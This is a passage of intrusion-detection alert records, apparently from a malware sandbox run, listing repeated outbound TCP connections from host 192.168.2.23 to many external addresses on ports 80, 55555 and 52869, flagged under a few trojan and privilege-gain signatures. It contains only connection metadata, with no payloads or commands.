    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.201.64.538342802027121 05/14/22-02:04:52.868346
    SID:2027121
    Source Port:38342
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.150.171.7244640802027121 05/14/22-02:04:09.313085
    SID:2027121
    Source Port:44640
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.99.170.4533644802027121 05/14/22-02:04:40.769297
    SID:2027121
    Source Port:33644
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.63.8838726802027121 05/14/22-02:04:36.682429
    SID:2027121
    Source Port:38726
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.226.106.22449930528692027339 05/14/22-02:03:58.604415
    SID:2027339
    Source Port:49930
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.51.24245628802027121 05/14/22-02:04:17.265531
    SID:2027121
    Source Port:45628
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.200.19256740555552027153 05/14/22-02:05:46.356024
    SID:2027153
    Source Port:56740
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.87.1.2257834802027121 05/14/22-02:04:34.518726
    SID:2027121
    Source Port:57834
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.99.138.24053168802027121 05/14/22-02:04:43.357808
    SID:2027121
    Source Port:53168
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.97.11534182555552027153 05/14/22-02:04:19.382917
    SID:2027153
    Source Port:34182
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.167.11059028555552027153 05/14/22-02:04:34.685648
    SID:2027153
    Source Port:59028
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.221.227.18053630802027121 05/14/22-02:05:50.047627
    SID:2027121
    Source Port:53630
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.10.175.4242760802027121 05/14/22-02:04:36.714857
    SID:2027121
    Source Port:42760
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.99.214.4635952802027121 05/14/22-02:04:52.770205
    SID:2027121
    Source Port:35952
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.211.6450236555552027153 05/14/22-02:05:06.237219
    SID:2027153
    Source Port:50236
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.96.2.1854422802027121 05/14/22-02:05:45.528566
    SID:2027121
    Source Port:54422
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.140.24358592802027121 05/14/22-02:04:55.066889
    SID:2027121
    Source Port:58592
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.41.60.1836672802027121 05/14/22-02:04:40.877472
    SID:2027121
    Source Port:36672
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.244.102.11538702528692027339 05/14/22-02:05:52.813667
    SID:2027339
    Source Port:38702
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.95.3339672555552027153 05/14/22-02:04:04.184416
    SID:2027153
    Source Port:39672
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.180.146.9351564802027121 05/14/22-02:04:34.515139
    SID:2027121
    Source Port:51564
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.124.3056878555552027153 05/14/22-02:04:39.300441
    SID:2027153
    Source Port:56878
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.52.241.2750394802027121 05/14/22-02:04:01.045396
    SID:2027121
    Source Port:50394
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.244.73.24855328528692027339 05/14/22-02:05:36.552777
    SID:2027339
    Source Port:55328
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.185.19260438802027121 05/14/22-02:04:43.365152
    SID:2027121
    Source Port:60438
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.182.9446454555552027153 05/14/22-02:05:33.583579
    SID:2027153
    Source Port:46454
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.91.11560806555552027153 05/14/22-02:05:37.001586
    SID:2027153
    Source Port:60806
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.57.8539362555552027153 05/14/22-02:05:41.244138
    SID:2027153
    Source Port:39362
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.87.90.24859292802027121 05/14/22-02:04:40.936768
    SID:2027121
    Source Port:59292
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2398.159.33.22754498555552027153 05/14/22-02:05:24.949664
    SID:2027153
    Source Port:54498
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.221.190.7657518802027121 05/14/22-02:04:43.334647
    SID:2027121
    Source Port:57518
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.111.10460754555552027153 05/14/22-02:05:30.411524
    SID:2027153
    Source Port:60754
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.101.251.4640078802027121 05/14/22-02:04:21.759965
    SID:2027121
    Source Port:40078
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.188.4252034802027121 05/14/22-02:03:55.661108
    SID:2027121
    Source Port:52034
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.46.155.18954704802027121 05/14/22-02:05:45.538592
    SID:2027121
    Source Port:54704
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.57.137.24547588802027121 05/14/22-02:05:19.828046
    SID:2027121
    Source Port:47588
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.127.4059250802027121 05/14/22-02:04:58.556033
    SID:2027121
    Source Port:59250
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.35.8157028802027121 05/14/22-02:04:32.325392
    SID:2027121
    Source Port:57028
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.231.21.15459472802027121 05/14/22-02:03:57.843382
    SID:2027121
    Source Port:59472
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.250.126.15040666528692027339 05/14/22-02:05:50.398115
    SID:2027339
    Source Port:40666
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.233.23444670555552027153 05/14/22-02:04:57.329185
    SID:2027153
    Source Port:44670
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.99.27.2959630802027121 05/14/22-02:04:04.408250
    SID:2027121
    Source Port:59630
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.180.146.2538416802027121 05/14/22-02:04:30.926544
    SID:2027121
    Source Port:38416
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.87.15359114802027121 05/14/22-02:03:53.362973
    SID:2027121
    Source Port:59114
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.86.641400555552027153 05/14/22-02:04:36.974233
    SID:2027153
    Source Port:41400
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.99.6.15337118802027121 05/14/22-02:04:57.386875
    SID:2027121
    Source Port:37118
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.34.183.10636654802027121 05/14/22-02:05:33.094042
    SID:2027121
    Source Port:36654
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.168.168.16852616802027121 05/14/22-02:03:57.738061
    SID:2027121
    Source Port:52616
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.183.37.14041168802027121 05/14/22-02:04:17.287353
    SID:2027121
    Source Port:41168
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.49.24535130802027121 05/14/22-02:04:57.381704
    SID:2027121
    Source Port:35130
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.99.32.23139366802027121 05/14/22-02:04:29.747000
    SID:2027121
    Source Port:39366
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.223.191.17654308802027121 05/14/22-02:04:00.998864
    SID:2027121
    Source Port:54308
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.142.39.19040324802027121 05/14/22-02:03:53.377984
    SID:2027121
    Source Port:40324
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.151.5035770802027121 05/14/22-02:04:55.171540
    SID:2027121
    Source Port:35770
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.199.22734996555552027153 05/14/22-02:05:37.018864
    SID:2027153
    Source Port:34996
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.86.1447446555552027153 05/14/22-02:04:11.654959
    SID:2027153
    Source Port:47446
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.254.70.11738860528692027339 05/14/22-02:05:37.010525
    SID:2027339
    Source Port:38860
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.246.22549336555552027153 05/14/22-02:04:31.062353
    SID:2027153
    Source Port:49336
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.221.250.12036710802027121 05/14/22-02:04:30.978771
    SID:2027121
    Source Port:36710
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.218.158.14353512802027121 05/14/22-02:04:32.244935
    SID:2027121
    Source Port:53512
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.105.8740248555552027153 05/14/22-02:04:31.062442
    SID:2027153
    Source Port:40248
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.245.113.11138934555552027153 05/14/22-02:04:07.379640
    SID:2027153
    Source Port:38934
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.193.184.6838586802027121 05/14/22-02:05:47.764684
    SID:2027121
    Source Port:38586
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.151.120.23954648802027121 05/14/22-02:04:19.380599
    SID:2027121
    Source Port:54648
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.240.108.22955326528692027339 05/14/22-02:04:51.841222
    SID:2027339
    Source Port:55326
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.226.61.7735510528692027339 05/14/22-02:05:03.298472
    SID:2027339
    Source Port:35510
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.245.25.841564555552027153 05/14/22-02:05:04.432633
    SID:2027153
    Source Port:41564
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.99.145.7544708802027121 05/14/22-02:05:02.936838
    SID:2027121
    Source Port:44708
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.129.189.1153350802027121 05/14/22-02:04:07.881985
    SID:2027121
    Source Port:53350
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.247.119.14756892802027121 05/14/22-02:04:19.409992
    SID:2027121
    Source Port:56892
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.48.24341020555552027153 05/14/22-02:04:43.913081
    SID:2027153
    Source Port:41020
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.77.11.1836288802027121 05/14/22-02:05:08.836665
    SID:2027121
    Source Port:36288
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.214.218.12438414802027121 05/14/22-02:04:01.070491
    SID:2027121
    Source Port:38414
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.110.236.2245362802027121 05/14/22-02:04:09.284651
    SID:2027121
    Source Port:45362
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.183.15.22143498802027121 05/14/22-02:04:23.251318
    SID:2027121
    Source Port:43498
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.69.15046380555552027153 05/14/22-02:05:37.019008
    SID:2027153
    Source Port:46380
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.116.5734996555552027153 05/14/22-02:04:24.881978
    SID:2027153
    Source Port:34996
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.147.144.12557076802027121 05/14/22-02:04:30.883444
    SID:2027121
    Source Port:57076
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.241.9347344555552027153 05/14/22-02:04:57.312233
    SID:2027153
    Source Port:47344
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.132.19643310555552027153 05/14/22-02:05:06.220049
    SID:2027153
    Source Port:43310
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.100.182.17258936802027121 05/14/22-02:04:23.192380
    SID:2027121
    Source Port:58936
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.201.18036496555552027153 05/14/22-02:05:45.978084
    SID:2027153
    Source Port:36496
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.86.206.24037732802027121 05/14/22-02:05:28.581595
    SID:2027121
    Source Port:37732
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.245.59.23446694528692027339 05/14/22-02:05:37.070954
    SID:2027339
    Source Port:46694
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.230.2638578555552027153 05/14/22-02:05:45.960758
    SID:2027153
    Source Port:38578
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.142.39.19040332802027121 05/14/22-02:03:53.460756
    SID:2027121
    Source Port:40332
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.10.13145578802027121 05/14/22-02:04:34.509938
    SID:2027121
    Source Port:45578
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.111.227.22049974802027121 05/14/22-02:04:25.535524
    SID:2027121
    Source Port:49974
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.79.23345034555552027153 05/14/22-02:05:54.037713
    SID:2027153
    Source Port:45034
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23197.44.95.23339792528692027339 05/14/22-02:05:48.080780
    SID:2027339
    Source Port:39792
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.179.21840834802027121 05/14/22-02:04:21.731177
    SID:2027121
    Source Port:40834
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.84.209.12444178802027121 05/14/22-02:04:34.530155
    SID:2027121
    Source Port:44178
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.241.16646476802027121 05/14/22-02:04:45.587757
    SID:2027121
    Source Port:46476
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.43.9648762555552027153 05/14/22-02:04:04.201524
    SID:2027153
    Source Port:48762
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.147.2144500555552027153 05/14/22-02:05:24.831840
    SID:2027153
    Source Port:44500
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.53.121.22358244802027121 05/14/22-02:05:36.550041
    SID:2027121
    Source Port:58244
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.244.18337580555552027153 05/14/22-02:05:21.335692
    SID:2027153
    Source Port:37580
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.217.234.23742976802027121 05/14/22-02:04:45.496386
    SID:2027121
    Source Port:42976
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.22.77.1933586802027121 05/14/22-02:05:16.374618
    SID:2027121
    Source Port:33586
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.245.103.9646626555552027153 05/14/22-02:05:21.142244
    SID:2027153
    Source Port:46626
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.217.177.21652404802027121 05/14/22-02:04:01.012402
    SID:2027121
    Source Port:52404
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.217.172.16433898802027121 05/14/22-02:04:32.232576
    SID:2027121
    Source Port:33898
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.247.4.1542394802027121 05/14/22-02:03:57.818353
    SID:2027121
    Source Port:42394
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.190.19056196555552027153 05/14/22-02:05:09.759089
    SID:2027153
    Source Port:56196
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.99.106.22060562802027121 05/14/22-02:04:21.715165
    SID:2027121
    Source Port:60562
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.156.3548314802027121 05/14/22-02:04:58.613996
    SID:2027121
    Source Port:48314
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.255.170.1759020802027121 05/14/22-02:04:37.610970
    SID:2027121
    Source Port:59020
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.46.159140555552027153 05/14/22-02:05:16.317135
    SID:2027153
    Source Port:59140
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.90.100.25360968802027121 05/14/22-02:04:45.495189
    SID:2027121
    Source Port:60968
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.10.2758494802027121 05/14/22-02:05:23.036314
    SID:2027121
    Source Port:58494
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.151.120.23954218802027121 05/14/22-02:04:04.436112
    SID:2027121
    Source Port:54218
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.217.74.2949830802027121 05/14/22-02:04:48.048276
    SID:2027121
    Source Port:49830
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.41.23933628555552027153 05/14/22-02:05:09.761720
    SID:2027153
    Source Port:33628
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.91.6249884555552027153 05/14/22-02:03:52.401161
    SID:2027153
    Source Port:49884
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.217.171.18950806802027121 05/14/22-02:05:03.000835
    SID:2027121
    Source Port:50806
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.245.107.23640466555552027153 05/14/22-02:05:04.432766
    SID:2027153
    Source Port:40466
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.211.48.23437548802027121 05/14/22-02:04:29.723243
    SID:2027121
    Source Port:37548
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.143.49.23841548802027121 05/14/22-02:04:09.265829
    SID:2027121
    Source Port:41548
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.113.23540052802027121 05/14/22-02:04:19.433599
    SID:2027121
    Source Port:40052
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.99.250.9638340802027121 05/14/22-02:03:57.760926
    SID:2027121
    Source Port:38340
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.110.188.5850186802027121 05/14/22-02:04:21.767738
    SID:2027121
    Source Port:50186
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.147.24056508555552027153 05/14/22-02:04:15.724140
    SID:2027153
    Source Port:56508
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.7.17351778555552027153 05/14/22-02:04:34.703705
    SID:2027153
    Source Port:51778
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.227.13246070555552027153 05/14/22-02:05:09.758844
    SID:2027153
    Source Port:46070
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.94.14451176555552027153 05/14/22-02:04:19.383126
    SID:2027153
    Source Port:51176
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.99.0.5634224802027121 05/14/22-02:04:40.793936
    SID:2027121
    Source Port:34224
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.245.35.20639160528692027339 05/14/22-02:04:01.120042
    SID:2027339
    Source Port:39160
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.203.15944186555552027153 05/14/22-02:03:58.555655
    SID:2027153
    Source Port:44186
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.205.16052354555552027153 05/14/22-02:04:49.789360
    SID:2027153
    Source Port:52354
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.226.100.4157032528692027339 05/14/22-02:05:04.864593
    SID:2027339
    Source Port:57032
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.241.21038106802027121 05/14/22-02:04:50.438289
    SID:2027121
    Source Port:38106
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.151.115.2648772802027121 05/14/22-02:04:09.698765
    SID:2027121
    Source Port:48772
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.248.100.21059808802027121 05/14/22-02:04:45.455125
    SID:2027121
    Source Port:59808
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.170.20642126555552027153 05/14/22-02:05:04.147038
    SID:2027153
    Source Port:42126
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.221.247.4656332802027121 05/14/22-02:05:16.728469
    SID:2027121
    Source Port:56332
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.65.48.2244716802027121 05/14/22-02:04:23.241574
    SID:2027121
    Source Port:44716
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.254.86.10347550528692027339 05/14/22-02:05:02.793230
    SID:2027339
    Source Port:47550
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.116.24337208555552027153 05/14/22-02:03:58.555471
    SID:2027153
    Source Port:37208
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.196.12241800555552027153 05/14/22-02:05:37.001489
    SID:2027153
    Source Port:41800
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.151.50.2139518802027121 05/14/22-02:05:23.027466
    SID:2027121
    Source Port:39518
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.245.176.10047458802027121 05/14/22-02:04:02.312326
    SID:2027121
    Source Port:47458
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.254.85.2345610528692027339 05/14/22-02:05:12.491233
    SID:2027339
    Source Port:45610
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.198.176.12760206802027121 05/14/22-02:04:13.144517
    SID:2027121
    Source Port:60206
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.10.20254556802027121 05/14/22-02:04:52.747584
    SID:2027121
    Source Port:54556
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.36.17548486555552027153 05/14/22-02:04:57.312175
    SID:2027153
    Source Port:48486
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.247.120.10250276802027121 05/14/22-02:05:50.075434
    SID:2027121
    Source Port:50276
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.18.13558280802027121 05/14/22-02:04:32.272004
    SID:2027121
    Source Port:58280
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.189.5648426802027121 05/14/22-02:03:55.661040
    SID:2027121
    Source Port:48426
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.214.1560194555552027153 05/14/22-02:05:20.978194
    SID:2027153
    Source Port:60194
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.100.77.4953544802027121 05/14/22-02:05:23.001580
    SID:2027121
    Source Port:53544
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.91.29.21342706802027121 05/14/22-02:05:19.755389
    SID:2027121
    Source Port:42706
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.97.20051602555552027153 05/14/22-02:04:34.685570
    SID:2027153
    Source Port:51602
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.65.25.2359674802027121 05/14/22-02:04:09.303014
    SID:2027121
    Source Port:59674
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2398.159.33.13042202555552027153 05/14/22-02:04:46.257949
    SID:2027153
    Source Port:42202
